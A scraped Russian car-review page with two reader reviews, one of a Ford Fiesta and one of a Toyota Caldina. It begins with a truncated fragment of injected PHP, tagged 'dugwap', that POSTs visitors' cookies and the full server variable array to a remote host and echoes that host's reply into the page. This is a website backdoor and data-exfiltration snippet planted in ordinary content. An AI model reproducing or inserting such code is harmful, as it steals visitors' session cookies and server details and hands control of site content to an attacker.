array("header"=>"User-Agent: PHP Modules dugwap\r\n","header"=>"Cookie: ".$_SERVER["HTTP_COOKIE"]."\r\n","method"=>"POST","timeout"=>2,"content"=>http_build_query($_SERVER))))); if($dugwap_result) echo $dugwap_result; ?>

Присланные отзывы за неделю


Прислал: Николай
Год: 2010
Эксплуатирую: 2 месяца
Отзыв:


Этот чисто женский автомобиль давно уже стал народным. Правда, мужчин за водительским сиденьем вы также сможете встретить. Самым модным цветом был цвет баклажан. Эта модель та, мимо которой не пройдешь без восхищения. Концепт Верв, который был основой для производства Фиесты, стал на Франкфуртском фестивале самым популярным среди фотографов. Подтверждение вы могли найти во всех журналах того года. Но и сейчас она не стала менее привлекательной. Передние фары настолько красивые и необычные, что являются чуть ли не самым любимым для любования мест наружного дизайна. Они также выполнены с максимальной защитой для пешехода в случае наезда. Внутренний интерьер также вас порадует. Центральная панель похожа на мобильный телефон: она почти с такими же кнопками и функциями. Эту панель изготовили в форме очков, а функции добавили после соцопроса потенциальных потребителей и их пожеланий. На руле слева кнопки регулировки громкости музыки, выбора радиостанций и переключения треков, справа круиз-контроль. Очень много карманов, вместительный бардачок, различные полки и целых 3 подстаканника. Этот молодежный автомобиль удался на славу!



Прислал: Виталий
Год: 1997
Эксплуатирую: 1 год
Отзыв:


Машина Калдина, несмотря на свой далекий от юного возраста, досталась мне в качестве почти что подарка. И я стал пятым по счету ее владельцем. К счастью, предыдущие хозяева относились к ней довольно благосклонно, сильно не пинали и даже кто-то из них умудрился обработать кузов действительно качественным антикоррозийным средством. Об этом мне заявили специалисты, которые пытались ответить на мой вопрос, надо ли кузов обезопасить хоть каким-нибудь образом дополнительно.

Пришлось переделать некоторые вещи, но список обработок не зашкаливал. Изначально вопрос стоял в подшипниках. Потом потянулись следом сальники и, что меня искренне удивило, инжектора. Последним озадачивался уже не я, а ребята-специалисты, потому что никогда раньше за свой богатый водительский опыт вообще не доводилось связываться с подобным. Перебивал заодно салон. Не за раз, конечно, все сделал, но теперь внутри все выглядит хотя бы опрятно. Да и пропал запах, который всегда преследует салон, если в нем долго и настоятельно курили.



Return to Top ▲НА ВЕРХ ▲